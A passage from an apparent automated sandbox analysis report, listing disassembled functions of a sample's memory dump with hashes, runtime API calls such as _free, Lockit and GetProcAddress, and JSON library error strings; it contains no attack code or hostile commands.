                                                                                    • Instruction ID: a3f1605c4b6fd009dfb3af54bc71263809da59bfb9b95b83e1440ba9007238a7
                                                                                    • Opcode Fuzzy Hash: 2901f57a192922c4ae5dacc04841a68ec35b1b2cdc35e8b601c2182c850b3a33
                                                                                    • Instruction Fuzzy Hash: 83D1CC71E141199FCB18EFA8CC91AFDBBB5BF44304F1041A8E116AB292EF70A945DB91
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: task
                                                                                    • String ID: T
                                                                                    • API String ID: 1384045349-3187964512
                                                                                    • Opcode ID: 686104f0fc8f6dd2a86c667839ba44840de5d47316a49fbba4185902850a8af2
                                                                                    • Instruction ID: f8559e43bc6ee63f9a2a0d11ecca3c30f2c7dbd1fee95b2ca566838bbae50d50
                                                                                    • Opcode Fuzzy Hash: 686104f0fc8f6dd2a86c667839ba44840de5d47316a49fbba4185902850a8af2
                                                                                    • Instruction Fuzzy Hash: 3A61167191460CEBCB18EFA8D891EFDBBF0BF48310F5481A9E41567291DB74AA06DB50
                                                                                    APIs
                                                                                    • task.LIBCPMTD ref: 00BB5376
                                                                                      • Part of subcall function 00C03D08: IsProcessorFeaturePresent.KERNEL32(00000017,00C0D33D,?,?,00C12E05,?,00000000,00000040,00000000,00000000,00000040,?,00000000,00000080,00000000,00000000), ref: 00C03D24
                                                                                      • Part of subcall function 00BB5DB0: std::bad_exception::~bad_exception.LIBCMTD ref: 00BB5DC8
                                                                                    • std::locale::facet::facet.LIBCPMTD ref: 00BB53D3
                                                                                    • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00BB5416
                                                                                    • Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection.LIBCONCRTD ref: 00BB54BF
                                                                                      • Part of subcall function 00BB3460: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00BB34A4
                                                                                      • Part of subcall function 00BA3630: char_traits.LIBCPMTD ref: 00BA366A
                                                                                      • Part of subcall function 00BBFD90: std::bad_exception::bad_exception.LIBCMTD ref: 00BBFD9D
                                                                                    Strings
                                                                                    • in Json::Value::operator[](ArrayIndex): requires arrayValue, xrefs: 00BB5324
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Processor$AsyncTaskVirtual$Affinity::operator!=CollectionCollection::~_Concurrency::Concurrency::details::Concurrency::details::_FeatureHardwarePresentRootRoot::char_traitsstd::bad_exception::bad_exceptionstd::bad_exception::~bad_exceptionstd::locale::facet::facettask
                                                                                    • String ID: in Json::Value::operator[](ArrayIndex): requires arrayValue
                                                                                    • API String ID: 2556177896-4279965437
                                                                                    • Opcode ID: d21b517723478f6dab61c9d4aedb0b2caf13a86214bafb57c23acd0bbd44f5d4
                                                                                    • Instruction ID: a1dd4ff35cbca7fd784e0548fd6ccc9373e4ecf7f61f4e2da02b3eb0b60a555f
                                                                                    • Opcode Fuzzy Hash: d21b517723478f6dab61c9d4aedb0b2caf13a86214bafb57c23acd0bbd44f5d4
                                                                                    • Instruction Fuzzy Hash: 66610B719002199BCB28EF94CD91BFEB7B4AF44300F5085E9E51AB7291DBB46E48CF61
                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00C0848E,00000000,?,00C08456,00000000,?,00000000), ref: 00C084AE
                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C084C1
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00C0848E,00000000,?,00C08456,00000000,?,00000000), ref: 00C084E4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                    • API String ID: 4061214504-1276376045
                                                                                    • Opcode ID: afd5a2da5479e990ce98d76080df647830ed747261d367d6b42e6eab20b79cc7
                                                                                    • Instruction ID: 965624c05fb5fc16cde0cfc85241b2cfad6c20e43300a0f3bccd7eb78d7f6f06
                                                                                    • Opcode Fuzzy Hash: afd5a2da5479e990ce98d76080df647830ed747261d367d6b42e6eab20b79cc7
                                                                                    • Instruction Fuzzy Hash: 69F01C31510619FBDB259BA1DD19B9E7EA8EB00756F108160E502A25A0CB748F05DB91
                                                                                    APIs
                                                                                      • Part of subcall function 00C0D52D: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,00BF51FC,00000000,00000000,00BB42D7,00000008), ref: 00C0D55F
                                                                                    • _free.LIBCMT ref: 00C0A7B1
                                                                                    • _free.LIBCMT ref: 00C0A7C8
                                                                                    • _free.LIBCMT ref: 00C0A7E5
                                                                                    • _free.LIBCMT ref: 00C0A800
                                                                                    • _free.LIBCMT ref: 00C0A817
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3033488037-0
                                                                                    • Opcode ID: aa1794f25358ea62a044f2b40e81ef907c604d8f6f96b04820d131e49e39489d
                                                                                    • Instruction ID: 432c5eec641b831325e6cbe18f3030b089a8c1aedf1b062836d112ff4fe39fd7
                                                                                    • Opcode Fuzzy Hash: aa1794f25358ea62a044f2b40e81ef907c604d8f6f96b04820d131e49e39489d
                                                                                    • Instruction Fuzzy Hash: 6251C372A10704AFDB20DF69DC81B6AB7F4EF54724F148669E81AE72D0E731EA01DB41
                                                                                    APIs
                                                                                    • List.LIBCMTD ref: 00BD0C0F
                                                                                    • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00BD0C55
                                                                                    • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00BD0DFB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Affinity::operator!=Concurrency::details::Hardware$List
                                                                                    • String ID:
                                                                                    • API String ID: 2362362913-0
                                                                                    • Opcode ID: 2d8172ca20024539401b0684d798d4cd2197c10d29160e04906066e6044b7ffb
                                                                                    • Instruction ID: 276bc48e1e32e6422af9d9a50662168ef221807fc32a19cbce8dd593731f7f23
                                                                                    • Opcode Fuzzy Hash: 2d8172ca20024539401b0684d798d4cd2197c10d29160e04906066e6044b7ffb
                                                                                    • Instruction Fuzzy Hash: 0D617F715102199BDB15EF64CCA2FEEB7F5EF44300F4441EAB9195B392EA70AE44CBA0
                                                                                    APIs
                                                                                    • std::ios_base::good.LIBCPMTD ref: 00BB8A8F
                                                                                    • std::ios_base::getloc.LIBCPMTD ref: 00BB8B11
                                                                                    • char_traits.LIBCPMTD ref: 00BB8BA5
                                                                                    • std::ios_base::good.LIBCPMTD ref: 00BB8C38
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: std::ios_base::good$char_traitsstd::ios_base::getloc
                                                                                    • String ID:
                                                                                    • API String ID: 1920461149-0
                                                                                    • Opcode ID: 9b6c124eaf65ead5954a072ccaa0d097f3d920a8a8a8f77cc3272876aa458e6a
                                                                                    • Instruction ID: 16169836eb127621c5c7ce03c605296d4cffffccc93be7c96e771fb5ed96f20d
                                                                                    • Opcode Fuzzy Hash: 9b6c124eaf65ead5954a072ccaa0d097f3d920a8a8a8f77cc3272876aa458e6a
                                                                                    • Instruction Fuzzy Hash: 8A613DB4E051099FCB14DFA4D891AFEFBB5EF45300F1481AAE4126B392DB75A905CB90
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BA4E1D
                                                                                      • Part of subcall function 00BA6D30: std::_Lockit::_Lockit.LIBCPMT ref: 00BA6D50
                                                                                      • Part of subcall function 00BA6D30: std::_Lockit::~_Lockit.LIBCPMT ref: 00BA6D7A
                                                                                    • ctype.LIBCPMTD ref: 00BA4E6D
                                                                                    • Concurrency::cancel_current_task.LIBCPMTD ref: 00BA4E7A
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BA4EEC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_taskctype
                                                                                    • String ID:
                                                                                    • API String ID: 2123697533-0
                                                                                    • Opcode ID: 4803e58d6e89015c278f5622baf157732b54dd03e6034b4092d5351b8c589488
                                                                                    • Instruction ID: e5cdca8bf8349dee04e6062bee3dbf2eb22d388dd4932c629db650e6d3c3bed9
                                                                                    • Opcode Fuzzy Hash: 4803e58d6e89015c278f5622baf157732b54dd03e6034b4092d5351b8c589488
                                                                                    • Instruction Fuzzy Hash: A731F875D0420D9FCB04DFA4C981AEEB7F0FB59310F1042A9E91577291DB346E05CBA1
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BA4F3D
                                                                                      • Part of subcall function 00BA6D30: std::_Lockit::_Lockit.LIBCPMT ref: 00BA6D50
                                                                                      • Part of subcall function 00BA6D30: std::_Lockit::~_Lockit.LIBCPMT ref: 00BA6D7A
                                                                                    • messages.LIBCPMTD ref: 00BA4F8D
                                                                                    • Concurrency::cancel_current_task.LIBCPMTD ref: 00BA4F9A
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BA500C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_taskmessages
                                                                                    • String ID:
                                                                                    • API String ID: 3083276929-0
                                                                                    • Opcode ID: 86ce0ca3789a28ecc14258e3e408cac07f7188954cdc387e17bf573acbd00b8e
                                                                                    • Instruction ID: 5e6ba406fe047adce493c651b557f6542ae6855db68a09208220654e97f2bdcf
                                                                                    • Opcode Fuzzy Hash: 86ce0ca3789a28ecc14258e3e408cac07f7188954cdc387e17bf573acbd00b8e
                                                                                    • Instruction Fuzzy Hash: 7431F774D042099FCB04DFA4C981BEEB7F0FB59310F1082A9E92577291DB356A09CBA1
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BB2F2D
                                                                                      • Part of subcall function 00BA6D30: std::_Lockit::_Lockit.LIBCPMT ref: 00BA6D50
                                                                                      • Part of subcall function 00BA6D30: std::_Lockit::~_Lockit.LIBCPMT ref: 00BA6D7A
                                                                                    • messages.LIBCPMTD ref: 00BB2F7D
                                                                                    • Concurrency::cancel_current_task.LIBCPMTD ref: 00BB2F8A
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BB2FFC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_taskmessages
                                                                                    • String ID:
                                                                                    • API String ID: 3083276929-0
                                                                                    • Opcode ID: de9cd525abddfea62080138b07685f1f5a427c8498974f45a48494d9c4be7574
                                                                                    • Instruction ID: f2dcb961eabbdfbf9dc81daf822169326e2d1ac951ab359cc9c48cc73f5bc422
                                                                                    • Opcode Fuzzy Hash: de9cd525abddfea62080138b07685f1f5a427c8498974f45a48494d9c4be7574
                                                                                    • Instruction Fuzzy Hash: EF31F874D042099FCB04EFA4C991BFEB7F4EF58310F1082A9E92167291DB746E45CBA1
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00C1545D
                                                                                      • Part of subcall function 00C0D859: RtlFreeHeap.NTDLL(00000000,00000000,?,00C156E6,?,00000000,?,?,?,00C15989,?,00000007,?,?,00C15F7F,?), ref: 00C0D86F
                                                                                      • Part of subcall function 00C0D859: GetLastError.KERNEL32(?,?,00C156E6,?,00000000,?,?,?,00C15989,?,00000007,?,?,00C15F7F,?,?), ref: 00C0D881
                                                                                    • _free.LIBCMT ref: 00C1546F
                                                                                    • _free.LIBCMT ref: 00C15481
                                                                                    • _free.LIBCMT ref: 00C15493
                                                                                    • _free.LIBCMT ref: 00C154A5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 9a5af2615543677bdaef9670b354196286f50755a5e51d37ce5258b0f61c3df8
                                                                                    • Instruction ID: 3fab42e168c97440d12b87ee7d4874a2e7d1a45d32226e558f035cf101ccc024
                                                                                    • Opcode Fuzzy Hash: 9a5af2615543677bdaef9670b354196286f50755a5e51d37ce5258b0f61c3df8
                                                                                    • Instruction Fuzzy Hash: 6CF04F76520610EFC620EBA4F482E5A73E9AA417227948919F05AF7980C730FDC0EA90
                                                                                    APIs
                                                                                    • task.LIBCPMTD ref: 00BBF446
                                                                                      • Part of subcall function 00C03D08: IsProcessorFeaturePresent.KERNEL32(00000017,00C0D33D,?,?,00C12E05,?,00000000,00000040,00000000,00000000,00000040,?,00000000,00000080,00000000,00000000), ref: 00C03D24
                                                                                      • Part of subcall function 00BB5DB0: std::bad_exception::~bad_exception.LIBCMTD ref: 00BB5DC8
                                                                                    • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00BBF4EF
                                                                                    • Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection.LIBCONCRTD ref: 00BBF5A7
                                                                                      • Part of subcall function 00BB3460: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00BB34A4
                                                                                      • Part of subcall function 00BA3630: char_traits.LIBCPMTD ref: 00BA366A
                                                                                      • Part of subcall function 00BBFD90: std::bad_exception::bad_exception.LIBCMTD ref: 00BBFD9D
                                                                                    Strings
                                                                                    • in Json::Value::resolveReference(key, end): requires objectValue, xrefs: 00BBF3F4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Processor$AsyncTaskVirtual$Affinity::operator!=CollectionCollection::~_Concurrency::Concurrency::details::Concurrency::details::_FeatureHardwarePresentRootRoot::char_traitsstd::bad_exception::bad_exceptionstd::bad_exception::~bad_exceptiontask
                                                                                    • String ID: in Json::Value::resolveReference(key, end): requires objectValue
                                                                                    • API String ID: 933040049-1669136557
                                                                                    • Opcode ID: 94415264d7e847560a54cbc36d44998a87ef318421587c2edc71454b7e60d4f0
                                                                                    • Instruction ID: 78726d732b8b80ae0f577236264483965d7a64f446465f41c81658ec502998d8
                                                                                    • Opcode Fuzzy Hash: 94415264d7e847560a54cbc36d44998a87ef318421587c2edc71454b7e60d4f0
                                                                                    • Instruction Fuzzy Hash: 72612C719002199BCB24EF98CD52BFEB7B4AF54300F5081E9E51AB7291DB746E48CF61
                                                                                    APIs
                                                                                    • task.LIBCPMTD ref: 00BBCE80
                                                                                      • Part of subcall function 00C03D08: IsProcessorFeaturePresent.KERNEL32(00000017,00C0D33D,?,?,00C12E05,?,00000000,00000040,00000000,00000000,00000040,?,00000000,00000080,00000000,00000000), ref: 00C03D24
                                                                                      • Part of subcall function 00BB5DB0: std::bad_exception::~bad_exception.LIBCMTD ref: 00BB5DC8
                                                                                    • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00BBCF54
                                                                                    • task.LIBCPMTD ref: 00BBCFBA
                                                                                      • Part of subcall function 00BB3460: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00BB34A4
                                                                                      • Part of subcall function 00BA3630: char_traits.LIBCPMTD ref: 00BA366A
                                                                                      • Part of subcall function 00BBFD90: std::bad_exception::bad_exception.LIBCMTD ref: 00BBFD9D
                                                                                    Strings
                                                                                    • in Json::Value::getMemberNames(), value must be objectValue, xrefs: 00BBCE2E
                                                                                    Memory Dump Source
